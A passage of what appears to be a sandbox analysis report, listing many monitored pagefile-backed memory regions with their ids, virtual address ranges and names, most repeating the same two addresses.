start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10359 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10360 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10361 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10362 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10363 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10364 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10365 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10366 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10367 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10368 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10369 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10370 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10371 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10372 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10373 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10374 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10375 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10376 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10377 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10378 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10379 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10380 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10381 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10382 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10383 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10384 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10385 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10386 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10387 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10388 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10389 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10390 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10391 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10392 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10393 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10394 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10395 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10396 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10397 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10398 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10399 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10400 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10401 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10402 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10403 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10404 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10405 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10406 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10407 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10408 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10409 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10410 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10411 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10412 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10413 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10414 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10415 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10416 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10417 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10418 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10419 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10420 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10421 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10422 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10423 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10424 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10425 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10426 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10427 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10428 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10429 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10430 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10431 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10432 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10433 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10434 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10435 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10436 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10437 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10438 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10439 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10440 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10441 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10442 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10443 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10444 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10445 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10446 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10447 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10448 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10449 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10450 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10451 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10452 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10453 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10454 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10455 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10456 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10457 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10458 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10459 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10460 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10461 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10462 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10463 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10464 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10465 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10466 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10467 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10468 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10469 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10470 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10471 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10472 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10473 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10474 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10475 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10476 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10477 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10478 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10479 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10480 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10481 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10482 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10483 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10484 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10485 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10486 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10487 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10488 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10489 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10490 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10491 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10492 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10493 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10494 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10495 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10496 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10497 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10498 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10499 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10500 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10501 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10502 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10503 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10504 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10505 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10506 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10507 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10508 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10509 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10510 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10511 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10512 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10513 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10514 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10515 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10516 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10517 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10518 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10519 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10520 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10521 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10522 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10523 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10524 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10525 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10526 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10527 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10528 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10529 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10530 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10531 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10532 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10533 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10534 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10535 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10536 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 